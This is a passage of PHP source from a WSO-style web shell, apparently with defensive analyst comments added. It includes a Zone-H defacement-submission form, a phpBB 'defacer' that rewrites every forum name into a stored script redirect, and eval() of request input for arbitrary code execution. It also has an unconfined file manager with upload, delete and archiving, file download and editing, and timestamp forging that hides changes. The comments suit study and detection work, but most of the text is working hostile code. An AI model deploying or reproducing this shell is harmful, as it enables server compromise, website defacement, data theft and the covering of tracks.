2458<font>Attaker Name<font><center><input type="text" class="inputz" name="defacer" value="Martyrs Crew" /><br>
2459<select name="hackmode" class="inputz" >
2460<option >------------------------ Select ------------------------</option>
2461<option value="1">known vulnerability (i.e. unpatched system)</option>
2462<option value="2" >undisclosed (new) vulnerability</option>
2463<option value="3" >configuration / admin. mistake</option>
2464<option value="4" >brute force attack</option>
2465<option value="5" >social engineering</option>
2466<option value="6" >Web Server intrusion</option>
2467<option value="7" >Web Server external module intrusion</option>
2468<option value="8" >Mail Server intrusion</option>
2469<option value="9" >FTP Server intrusion</option>
2470<option value="10" >SSH Server intrusion</option>
2471<option value="11" >Telnet Server intrusion</option>
2472<option value="12" >RPC Server intrusion</option>
2473<option value="13" >Shares misconfiguration</option>
2474<option value="14" >Other Server intrusion</option>
2475<option value="15" >SQL Injection</option>
2476<option value="16" >URL Poisoning</option>
2477<option value="17" >File Inclusion</option>
2478<option value="18" >Other Web Application bug</option>
2479<option value="19" >Remote administrative panel access bruteforcing</option>
2480<option value="20" >Remote administrative panel access password guessing</option>
2481<option value="21" >Remote administrative panel access social engineering</option>
2482<option value="22" >Attack against administrator(password stealing/sniffing)</option>
2483<option value="23" >Access credentials through Man In the Middle attack</option>
2484<option value="24" >Remote service password guessing</option>
2485<option value="25" >Remote service password bruteforce</option>
2486<option value="26" >Rerouting after attacking the Firewall</option>
2487<option value="27" >Rerouting after attacking the Router</option>
2488<option value="28" >DNS attack through social engineering</option>
2489<option value="29" >DNS attack through cache poisoning</option>
2490<option value="30" >Not available</option>
2491</select>
2492<select name="reason" class="inputz" >
2493<option >------------- Select ---------------</option>
2494<option value="1" >Heh...just for fun!</option>
2495<option value="2" >Revenge against that website</option>
2496<option value="3" >Political reasons</option>
2497<option value="4" >As a challenge</option>
2498<option value="5" >I just want to be the best defacer</option>
2499<option value="6" >Patriotism</option>
2500<option value="7" >Not available</option>
2501</select>
2502<input type="hidden" name="action" value="zone">
2503<center><textarea name="domain" cols="116" rows="9" id="domains">-Jijle3 : Sites Here</textarea>
2504<br /><input type="hidden" name="a" value="zoneh"><input class='inputzbut' type="submit" value="Send'it Please !" name="SendNowToZoneH" /><br></center></table>
2505</form></td></tr></table></form>
2506<!-- End Of Zone-H -->
2507</td></center><br><br>
2508<?php
2509echo '<center>';
2510 ob_start();
2511 $sub = get_loaded_extensions();
2512 if(!in_array("curl", $sub)){die('[-] Curl Is Not Supported !! ');}
2513 $hacker = $_POST['defacer'];
2514 $method = $_POST['hackmode'];
2515 $neden = $_POST['reason'];
2516 $site = $_POST['domain'];
2517 if (empty($hacker)){die ("[-] You Must Fill the Attacker name !");}
2518 elseif($method == "--------SELECT--------") {die("[-] You Must Select The Method !");}
2519 elseif($neden == "--------SELECT--------") {die("[-] You Must Select The Reason");}
2520 elseif(empty($site)) {die("[-] You Must Inter the Sites List ! ");}
2521 $i = 0;
2522 $sites = explode("\n", $site);
2523 while($i < count($sites))
2524 {
2525 if(substr($sites[$i], 0, 4) != "http") {$sites[$i] = "http://".$sites[$i];}
 // One call to the external ZoneH() helper per submitted line; its result is not checked here.
2526 ZoneH("http://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]);
2527 echo "Site : ".$sites[$i]." Defaced !\n";
2528 ++$i;
2529 }
2530 echo "[+] Sending Sites To Zone-H.org Has Been Completed Successfully ! ! ";
2531 echo '</center>';
2532}
2533wsoFooter();
2534}
2535######################### phpbb defacer ###########################
/**
 * Web-shell handler for action "phpbb" (a=phpbb): forum name overwrite with a
 * script redirect.
 *
 * Prints a form, then reads POST fields f5-f9 and index2. When f6 (database
 * name) is non-empty it connects to MySQL with the operator-supplied host,
 * user and password and runs an UPDATE on the table named in f9 (form default
 * "phpbb_forums"), setting forum_name to a <script> element that assigns
 * index2 to location.href.
 *
 * Defender notes: the UPDATE has no WHERE clause, so every forum row receives
 * the same value; the stored markup acts as a stored-XSS redirect wherever the
 * application prints forum_name unescaped. Searching forum_name for "<script"
 * is the direct check. The echo that prints the form ends with a comma, so the
 * f5 assignment is evaluated as a further echo argument and the submitted host
 * value is written into the page unescaped. POST values are concatenated into
 * the SQL text unescaped.
 */
2536function actionphpbb() {
2537wsoHeader();
2538echo'<center><h1> PHPBB index Changer </h1>
2539<form method = "POST">
2540<table border = "1" width="443" height="316" style="text-align: center" align="center">
2541<tr>
2542<td height="105" width="780">
2543<p align="center"><b>Host : </b>
2544<input type="text" name="f5" size="20" value="localhost"> <b>
2545DataBase :</b> <input type ="text" name = "f6" size="20"></p>
2546<p align="center"> <b>User :</b> <input type ="text" name = "f7" size="20">
2547<b> Password :</b> <input type ="text" name = "f8" size="20"><p align="center">
2548<b>Table Prefix:</b><br>
2549<input type ="text" name = "f9" size="20" value="phpbb_forums"></td>
2550</tr>
2551<tr>
2552<td height="167" width="780"><p align="center"> <textarea name="index2" cols=50 rows=10> <br><center>Hacked By Phenomene Dz <br><center>[ Martyrs Crew ]<br>#Algerian Hacker <br><center>#Free Pilastine <br><center>#www.fb.com/J1jeI
2553 </textarea><p align="center"><input type="hidden" name="a" value="phpbb"><input type = "submit" value = "Deface !">
2554<input type = "reset" value = "Clear"></td>
2555</tr>
2556</tr>',
2557$localhost2 = $_POST['f5'];
2558$database2 = $_POST['f6'];
2559$username2 = $_POST['f7'];
2560$password2 = $_POST['f8'];
2561$index2 = $_POST['index2'];
2562$phpbb = $_POST['f9'];
// Assignment inside the condition: the branch runs whenever f6 is non-empty.
2563if($database2=$_POST['f6']){
2564$con2 =@ mysql_connect($localhost2,$username2,$password2) or die;
2565$db2 =@ mysql_select_db($database2,$con2) or die;
// No WHERE clause: every row's forum_name becomes the same script redirect.
2566$query2 = "UPDATE $phpbb SET forum_name = '<script>location.href=\"$index2\"</script>'" or die;
2567$result2 =@ mysql_query($query2,$con2);
2568if($result2){
2569echo "<p align='center'>
2570<marquee behavior='alternate' bgcolor='#FF0000' style='color: #000000; font-weight: bold'>[ Mr.511 ]----[ Update Finish ]----[ Mr.511 ]</marquee></p>";
2571}
2572else {
2573echo "<p align='center'><marquee behavior='alternate' bgcolor='#FF0000' style='color: #000000; font-weight: bold'>[ Mr.511 ]----[ Please Check Database Information ]----[ Mr.511 ]</marquee></p>";
2574}
2575}
2576//Greetz to FoX HACKER
2577//Coded by Mr.511
2578//x08d@hotmail.CoM
2579wsoFooter();}
2580##########################################################
// Analyst note: handler for the panel's PHP-execution pane. POST field p1 is passed to eval()
// verbatim in two places (the AJAX branch and the full-page branch); the captured output is
// HTML-escaped before it is sent back. p2=info additionally dumps phpinfo().
// Defender view: eval() on a request parameter is a high-signal static indicator for file
// scanners. eval is a language construct, so disable_functions cannot switch it off; finding
// the dropped file (file-integrity monitoring, web-root scans) is the control that applies.
2581function actionPhp() {
2582 if(isset($_POST['ajax'])) {
// Remembers the "send using AJAX" checkbox in the session, keyed by md5 of the Host header.
2583 $_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = true;
2584 ob_start();
2585 eval($_POST['p1']);
// Reply format: length of the snippet, a newline, then JavaScript that fills #PhpOutput.
2586 $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "\n\r\t\\'\0") . "';\n";
2587 echo strlen($temp), "\n", $temp;
2588 exit;
2589 }
2590 wsoHeader();
// p2=info: embed phpinfo() output, with its own CSS rules stripped or rewritten to fit the panel.
2591 if(isset($_POST['p2']) && ($_POST['p2'] == 'info')) {
2592 echo '<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>';
2593 ob_start();
2594 phpinfo();
2595 $tmp = ob_get_clean();
2596 $tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);
2597 $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
2598 echo str_replace('<h1','<h2', $tmp) .'</div><br>';
2599 }
2600 if(empty($_POST['ajax']) && !empty($_POST['p1']))
2601 $_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = false;
2602 echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(\'Php\',null,this.code.value);}else{g(\'Php\',null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Exec style="margin-top:5px">';
2603 echo ' <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
// Non-AJAX path: same eval of p1, output escaped into the <pre> opened above.
2604 if(!empty($_POST['p1'])) {
2605 ob_start();
2606 eval($_POST['p1']);
2607 echo htmlspecialchars(ob_get_clean());
2608 }
2609 echo '</pre></div>';
2610 wsoFooter();
2611}
// Analyst note: file-manager pane. Phase one acts on POST p1: uploadFile, mkdir, delete and
// paste run immediately; any other value (copy, move, zip, unzip, tar from the select box
// below) is only recorded in $_SESSION (act, f, c) and carried out by a later "paste" request.
// Phase two lists the directory in POST c (or the current working directory) as a sortable table.
// Defender view: every path comes from the request or the session with no confinement, so the
// reach is whatever the PHP process user can read or write. Triage artefacts: uploads saved
// under their client-supplied name, archives named wso_<date>_<time>.zip / .tar.gz (the default
// the form offers), and tar child processes of the web server user (started through wsoEx,
// which is defined outside this view).
2612function actionFilesMan() {
2613 wsoHeader();
2614 echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>';
2615 if(!empty($_POST['p1'])) {
2616 switch($_POST['p1']) {
2617 case 'uploadFile':
// Destination is the client-supplied file name, taken as-is.
2618 if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']))
2619 echo "Can't upload file!";
2620 break;
2621 case 'mkdir':
2622 if(!@mkdir($_POST['p2']))
2623 echo "Can't create new dir";
2624 break;
2625 case 'delete':
// Recursive delete helper; it is declared only when this case is reached.
2626 function deleteDir($path) {
2627 $path = (substr($path,-1)=='/') ? $path:$path.'/';
2628 $dh = opendir($path);
2629 while ( ($item = readdir($dh) ) !== false) {
2630 $item = $path.$item;
2631 if ( (basename($item) == "..") || (basename($item) == ".") )
2632 continue;
2633 $type = filetype($item);
2634 if ($type == "dir")
2635 deleteDir($item);
2636 else
2637 @unlink($item);
2638 }
2639 closedir($dh);
2640 @rmdir($path);
2641 }
// Names arrive url-encoded from the listing's checkboxes (f[]).
2642 if(is_array(@$_POST['f']))
2643 foreach($_POST['f'] as $f) {
2644 if($f == '..')
2645 continue;
2646 $f = urldecode($f);
2647 if(is_dir($f))
2648 deleteDir($f);
2649 else
2650 @unlink($f);
2651 }
2652 break;
2653 case 'paste':
// Executes the operation stored in the session by an earlier request:
// $_SESSION['c'] is the source directory, $_SESSION['f'] the selected names.
2654 if($_SESSION['act'] == 'copy') {
2655 function copy_paste($c,$s,$d){
2656 if(is_dir($c.$s)){
2657 mkdir($d.$s);
2658 $h = @opendir($c.$s);
2659 while (($f = @readdir($h)) !== false)
2660 if (($f != ".") and ($f != ".."))
2661 copy_paste($c.$s.'/',$f, $d.$s.'/');
2662 } elseif(is_file($c.$s))
2663 @copy($c.$s, $d.$s);
2664 }
2665 foreach($_SESSION['f'] as $f)
2666 copy_paste($_SESSION['c'],$f, $GLOBALS['cwd']);
2667 } elseif($_SESSION['act'] == 'move') {
// move_paste is declared here, but the loop below moves entries with rename() instead.
2668 function move_paste($c,$s,$d){
2669 if(is_dir($c.$s)){
2670 mkdir($d.$s);
2671 $h = @opendir($c.$s);
2672 while (($f = @readdir($h)) !== false)
2673 if (($f != ".") and ($f != ".."))
2674 copy_paste($c.$s.'/',$f, $d.$s.'/');
2675 } elseif(@is_file($c.$s))
2676 @copy($c.$s, $d.$s);
2677 }
2678 foreach($_SESSION['f'] as $f)
2679 @rename($_SESSION['c'].$f, $GLOBALS['cwd'].$f);
2680 } elseif($_SESSION['act'] == 'zip') {
// Archive name comes from POST p2; the second argument 1 is the numeric open flag.
2681 if(class_exists('ZipArchive')) {
2682 $zip = new ZipArchive();
2683 if ($zip->open($_POST['p2'], 1)) {
2684 chdir($_SESSION['c']);
2685 foreach($_SESSION['f'] as $f) {
2686 if($f == '..')
2687 continue;
2688 if(@is_file($_SESSION['c'].$f))
2689 $zip->addFile($_SESSION['c'].$f, $f);
2690 elseif(@is_dir($_SESSION['c'].$f)) {
2691 $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/'));
2692 foreach ($iterator as $key=>$value) {
2693 $zip->addFile(realpath($key), $key);
2694 }
2695 }
2696 }
2697 chdir($GLOBALS['cwd']);
2698 $zip->close();
2699 }
2700 }
2701 } elseif($_SESSION['act'] == 'unzip') {
// Every selected archive is extracted into the current working directory.
2702 if(class_exists('ZipArchive')) {
2703 $zip = new ZipArchive();
2704 foreach($_SESSION['f'] as $f) {
2705 if($zip->open($_SESSION['c'].$f)) {
2706 $zip->extractTo($GLOBALS['cwd']);
2707 $zip->close();
2708 }
2709 }
2710 }
2711 } elseif($_SESSION['act'] == 'tar') {
// Archive name and each selected name are shell-quoted before the tar command line is built.
2712 chdir($_SESSION['c']);
2713 $_SESSION['f'] = array_map('escapeshellarg', $_SESSION['f']);
2714 wsoEx('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_SESSION['f']));
2715 chdir($GLOBALS['cwd']);
2716 }
2717 unset($_SESSION['f']);
2718 break;
2719 default:
// Any other p1 value is stored as the pending operation together with the selection.
2720 if(!empty($_POST['p1'])) {
2721 $_SESSION['act'] = @$_POST['p1'];
2722 $_SESSION['f'] = @$_POST['f'];
2723 foreach($_SESSION['f'] as $k => $f)
2724 $_SESSION['f'][$k] = urldecode($f);
2725 $_SESSION['c'] = @$_POST['c'];
2726 }
2727 break;
2728 }
2729 }
// Listing phase: directory from POST c, falling back to the panel's working directory.
2730 $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
2731 if($dirContent === false) { echo 'Can\'t open this folder!';wsoFooter(); return; }
2732 global $sort;
2733 $sort = array('name', 1);
// p1 of the form s_<column>_<0|1> selects the sort column and direction.
2734 if(!empty($_POST['p1'])) {
2735 if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))
2736 $sort = array($match[1], (int)$match[2]);
2737 }
2738echo "<script>
2739 function sa() {
2740 for(i=0;i<d.files.elements.length;i++)
2741 if(d.files.elements[i].type == 'checkbox')
2742 d.files.elements[i].checked = d.files.elements[0].checked;
2743 }
2744</script>
2745<table width='100%' class='main' cellspacing='0' cellpadding='2'>
2746<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>";
2747$dirs = $files = array();
2748 $n = count($dirContent);
// One record per directory entry: name, path, mtime, permissions, size, owner and group.
2749 for($i=0;$i<$n;$i++) {
2750 $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
2751 $gr = @posix_getgrgid(@filegroup($dirContent[$i]));
2752 $tmp = array('name' => $dirContent[$i],
2753 'path' => $GLOBALS['cwd'].$dirContent[$i],
2754 'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])),
2755 'perms' => wsoPermsColor($GLOBALS['cwd'] . $dirContent[$i]),
2756 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
2757 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),
2758 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])
2759 );
2760 if(@is_file($GLOBALS['cwd'] . $dirContent[$i]))
2761 $files[] = array_merge($tmp, array('type' => 'file'));
2762 elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i]))
2763 $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));
2764 elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i])&& ($dirContent[$i] != "."))
2765 $dirs[] = array_merge($tmp, array('type' => 'dir'));
2766 }
2767 $GLOBALS['sort'] = $sort;
// Comparator for usort(): case-insensitive string compare on the chosen column, numeric for size.
2768 function wsoCmp($a, $b) {
2769 if($GLOBALS['sort'][0] != 'size')
2770 return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1);
2771 else
2772 return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
2773 }
2774 usort($files, "wsoCmp");
2775 usort($dirs, "wsoCmp");
2776 $files = array_merge($dirs, $files);
2777 $l = 0;
// One table row per entry; file names are url-encoded into the g(...) onclick handlers.
2778 foreach($files as $f) {
2779 echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');" title=' . $f['link'] . '><b>[ ' . htmlspecialchars($f['name']) . ' ]</b>').'</a></td><td>'.(($f['type']=='file')?wsoViewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms']
2780 .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>';
2781 $l = $l?0:1;
2782 }
2783 echo "<tr><td colspan=7>
2784
2785 <input type=hidden name=a value='FilesMan'>
2786 <input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'>
2787 <input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'')."'>
2788 <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>";
2789 if(class_exists('ZipArchive'))
2790 echo "<option value='zip'>Compress (zip)</option><option value='unzip'>Uncompress (zip)</option>";
2791 echo "<option value='tar'>Compress (tar.gz)</option>";
2792 if(!empty($_SESSION['act']) && @count($_SESSION['f']))
2793 echo "<option value='paste'>Paste / Compress</option>";
2794 echo "</select> ";
2795 if(!empty($_SESSION['act']) && @count($_SESSION['f']) && (($_SESSION['act'] == 'zip') || ($_SESSION['act'] == 'tar')))
2796 echo "file name: <input type=text name=p2 value='wso_" . date("Ymd_His") . "." . ($_SESSION['act'] == 'zip'?'zip':'tar.gz') . "'> ";
2797 echo "<input type='submit' value='>>'></td></tr></form></table></div>";
2798 wsoFooter();
2799}
2800########################## String ##############################
// Analyst note: string-conversion pane plus a file-content search.
// POST p1 names a function and p2 is its argument; p1 is called only when in_array() finds it
// among the values of $stringTools (non-strict comparison). The helper functions declared first
// are defined only when no function of that name exists already.
// wsoRecursiveGlob() walks down from POST c, globbing with POST p3, and prints a link for every
// file whose content contains POST p2; each candidate file is read in full.
// The closing form is submitted from the operator's browser to third-party hash-lookup sites;
// nothing in this block sends the hash from the server.
// Defender view: the search shows up as the web server user reading many files under one tree
// within a single request.
2801function actionStringTools() {
2802 if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
2803 if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}}
2804 if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}
2805 if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= sprintf('%02X',ord($p[$i]));return strtoupper($r);}}
2806 if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
// Label => callable name; the values act as the allow-list for the dynamic call below.
2807 $stringTools = array(
2808 'Base64 encode' => 'base64_encode',
2809 'Base64 decode' => 'base64_decode',
2810 'Url encode' => 'urlencode',
2811 'Url decode' => 'urldecode',
2812 'Full urlencode' => 'full_urlencode',
2813 'md5 hash' => 'md5',
2814 'sha1 hash' => 'sha1',
2815 'crypt' => 'crypt',
2816 'CRC32' => 'crc32',
2817 'ASCII to HEX' => 'ascii2hex',
2818 'HEX to ASCII' => 'hex2ascii',
2819 'HEX to DEC' => 'hexdec',
2820 'HEX to BIN' => 'hex2bin',
2821 'DEC to HEX' => 'dechex',
2822 'DEC to BIN' => 'decbin',
2823 'BIN to HEX' => 'binhex',
2824 'BIN to DEC' => 'bindec',
2825 'String to lower case' => 'strtolower',
2826 'String to upper case' => 'strtoupper',
2827 'Htmlspecialchars' => 'htmlspecialchars',
2828 'String length' => 'strlen',
2829 );
// AJAX branch: reply is the snippet length, a newline, then JavaScript that fills #strOutput.
2830 if(isset($_POST['ajax'])) {
2831 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
2832 ob_start();
2833 if(in_array($_POST['p1'], $stringTools))
2834 echo $_POST['p1']($_POST['p2']);
2835 $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
2836 echo strlen($temp), "\n", $temp;
2837 exit;
2838 }
2839 wsoHeader();
2840 echo '<h1>String conversions</h1><div class=content>';
2841 if(empty($_POST['ajax'])&&!empty($_POST['p1']))
2842 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
2843 echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";
2844 foreach($stringTools as $k => $v)
2845 echo "<option value='".htmlspecialchars($v)."'>".$k."</option>";
2846 echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".(@$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".(empty($_POST['p1'])?'':htmlspecialchars(@$_POST['p2']))."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>";
2847 if(!empty($_POST['p1'])) {
2848 if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2']));
2849 }
// Content search: glob pattern from p3, needle from p2, start directory passed in by the caller.
2850 function wsoRecursiveGlob($path) {
2851 if(substr($path, -1) != '/')
2852 $path.='/';
2853 $paths = @array_unique(@array_merge(@glob($path.$_POST['p3']), @glob($path.'*', GLOB_ONLYDIR)));
2854 if(is_array($paths)&&@count($paths)) {
2855 foreach($paths as $item) {
2856 if(@is_dir($item)){
2857 if($path!=$item)
2858 wsoRecursiveGlob($item);
2859 } else {
2860 if(@strpos(@file_get_contents($item), @$_POST['p2'])!==false)
2861 echo "<a href='#' onclick='g(\"FilesTools\",null,\"".urlencode($item)."\", \"view\")'>".htmlspecialchars($item)."</a><br>";
2862 }
2863 }
2864 }
2865 }
2866 if(@$_POST['p3'])
2867 wsoRecursiveGlob($_POST['c']);
2868 echo "</div><br><h1>Best Hash Search Engine :</h1><div class=content>
2869
2870 <form method='post' target='_blank' name='hf'>
2871 <input type='text' name='hash' style='width:200px;'><br>
2872 <input type='button' value='hashcrack.com' onclick=\"document.hf.action='http://www.hashcrack.com/index.php';document.hf.submit()\"><br>
2873 <input type='button' value='hashcracking.info' onclick=\"document.hf.action='https://hashcracking.info/index.php';document.hf.submit()\"><br>
2874 <input type='button' value='md5.rednoize.com' onclick=\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br>
2875 <input type='button' value='md5decrypter.com' onclick=\"document.hf.action='http://www.md5decrypter.com/';document.hf.submit()\"><br>
2876 </form></div>";
2877 wsoFooter();
2878}
2879
// Analyst note: single-file pane. POST p1 is the (url-encoded) path and p2 the operation:
// download, mkfile, view, highlight, chmod, edit, hexdump, rename or touch; p3 carries the
// operation's argument. The path is used as given, with no confinement to any directory.
// Defender view, timestamps: the edit case re-applies the file's previous mtime after writing,
// and the touch case sets mtime/atime to any operator-chosen time, so mtime cannot be trusted
// on a host where this ran. touch() does not let the caller choose ctime, which makes ctime
// (and backups / file-integrity baselines) the better evidence of modification.
2880function actionFilesTools() {
2881 if( isset($_POST['p1']) )
2882 $_POST['p1'] = urldecode($_POST['p1']);
// download: streams the file back gzip-compressed as an attachment and ends the request.
2883 if(@$_POST['p2']=='download') {
2884 if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) {
2885 ob_start("ob_gzhandler", 4096);
2886 header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
2887 if (function_exists("mime_content_type")) {
2888 $type = @mime_content_type($_POST['p1']);
2889 header("Content-Type: " . $type);
2890 } else
2891 header("Content-Type: application/octet-stream");
2892 $fp = @fopen($_POST['p1'], "r");
2893 if($fp) {
2894 while(!@feof($fp))
2895 echo @fread($fp, 1024);
2896 fclose($fp);
2897 }
2898 }exit;
2899 }
// mkfile: creates an empty file if none exists, then continues as "edit".
2900 if( @$_POST['p2'] == 'mkfile' ) {
2901 if(!file_exists($_POST['p1'])) {
2902 $fp = @fopen($_POST['p1'], 'w');
2903 if($fp) {
2904 $_POST['p2'] = "edit";
2905 fclose($fp);
2906 }
2907 }
2908 }
2909 wsoHeader();
2910 echo '<h1>File Tools</h1><div class=content>';
2911 if( !file_exists(@$_POST['p1']) ) {
2912 echo 'File not exists';
2913 wsoFooter();
2914 return;
2915 }
// Metadata header: owner/group names when the posix lookup works, numeric ids otherwise.
2916 $uid = @posix_getpwuid(@fileowner($_POST['p1']));
2917 if(!$uid) {
2918 $uid['name'] = @fileowner($_POST['p1']);
2919 $gid['name'] = @filegroup($_POST['p1']);
2920 } else $gid = @posix_getgrgid(@filegroup($_POST['p1']));
2921 echo '<span>Name:</span> '.htmlspecialchars(@basename($_POST['p1'])).' <span>Size:</span> '.(is_file($_POST['p1'])?wsoViewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.wsoPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
2922 echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>';
2923 if( empty($_POST['p2']) )
2924 $_POST['p2'] = 'view';
// Directories only get the metadata operations.
2925 if( is_file($_POST['p1']) )
2926 $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
2927 else
2928 $m = array('Chmod', 'Rename', 'Touch');
2929 foreach($m as $v)
2930 echo '<a href=# onclick="g(null,null,null,\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> ';
2931 echo '<br><br>';
2932 switch($_POST['p2']) {
2933 case 'view':
2934 echo '<pre class=ml1>';
2935 $fp = @fopen($_POST['p1'], 'r');
2936 if($fp) {
2937 while( !@feof($fp) )
2938 echo htmlspecialchars(@fread($fp, 1024));
2939 @fclose($fp);
2940 }
2941 echo '</pre>';
2942 break;
2943 case 'highlight':
2944 if( @is_readable($_POST['p1']) ) {
2945 echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';
2946 $code = @highlight_file($_POST['p1'],true);
2947 echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>';
2948 }
2949 break;
2950 case 'chmod':
// p3 is read as a string of octal digits and converted to the numeric mode by hand.
2951 if( !empty($_POST['p3']) ) {
2952 $perms = 0;
2953 for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
2954 $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
2955 if(!@chmod($_POST['p1'], $perms))
2956 echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
2957 }
2958 clearstatcache();
2959 echo '<script>p3_="";</script><form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>';
2960 break;
2961 case 'edit':
2962 if( !is_writable($_POST['p1'])) {
2963 echo 'File isn\'t writeable';
2964 break;
2965 }
2966 if( !empty($_POST['p3']) ) {
// The old mtime is saved before the write and put back afterwards (see the header note).
2967 $time = @filemtime($_POST['p1']);
// The form below prefixes the content with '1' so that p3 is never empty; strip it again.
2968 $_POST['p3'] = substr($_POST['p3'],1);
2969 $fp = @fopen($_POST['p1'],"w");
2970 if($fp) {
2971 @fwrite($fp,$_POST['p3']);
2972 @fclose($fp);
2973 echo 'Saved!<br><script>p3_="";</script>';
2974 @touch($_POST['p1'],$time,$time);
2975 }
2976 }
